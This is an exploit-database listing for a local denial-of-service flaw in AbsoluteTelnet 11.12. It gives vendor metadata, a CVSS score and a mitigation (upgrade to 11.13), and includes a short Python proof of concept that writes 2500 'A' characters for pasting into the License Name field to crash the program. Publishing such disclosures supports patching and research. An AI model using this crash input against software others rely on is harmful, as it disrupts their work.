header-logo
Suggest Exploit
vendor:
AbsoluteTelnet
by:
chuyreds
7.8
CVSS
HIGH
Denial of Service (DoS) Local
400
CWE
Product Name: AbsoluteTelnet
Affected Version From: 11.12
Affected Version To: 11.12
Patch Exists: YES
Related CWE: N/A
CPE: a:celestial_software:absolutetelnet:11.12
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 es
2020

AbsoluteTelnet 11.12 – “license name” Denial of Service (PoC)

A denial of service vulnerability exists in AbsoluteTelnet 11.12 when a maliciously crafted license name is entered, resulting in a crash. An attacker can exploit this vulnerability by running a python code to generate a maliciously crafted license name, copying the content to clipboard, opening AbsoluteTelnet.exe, selecting Help > Enter License Key, and pasting the clipboard in the License Name field.

Mitigation:

Upgrade to AbsoluteTelnet version 11.13 or later.
Source

Exploit-DB raw data:

# Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es


#Steps to produce the crash:
#1.- Run python code: AbsoluteTelent 11.12_license_name.py
#2.- Open AbsoluteTelent_license_name.txt and copy content to clipboard
#3.- Open AbsoluteTelnet.exe
#4.- Select "Help" > "Enter License Key"
#5.- In "License Name" paste Clipboard
#6.- Crashed

cod = "\x41" * 2500

f = open('AbsoluteTelent_license_name.txt', 'w')
f.write(cod)
f.close()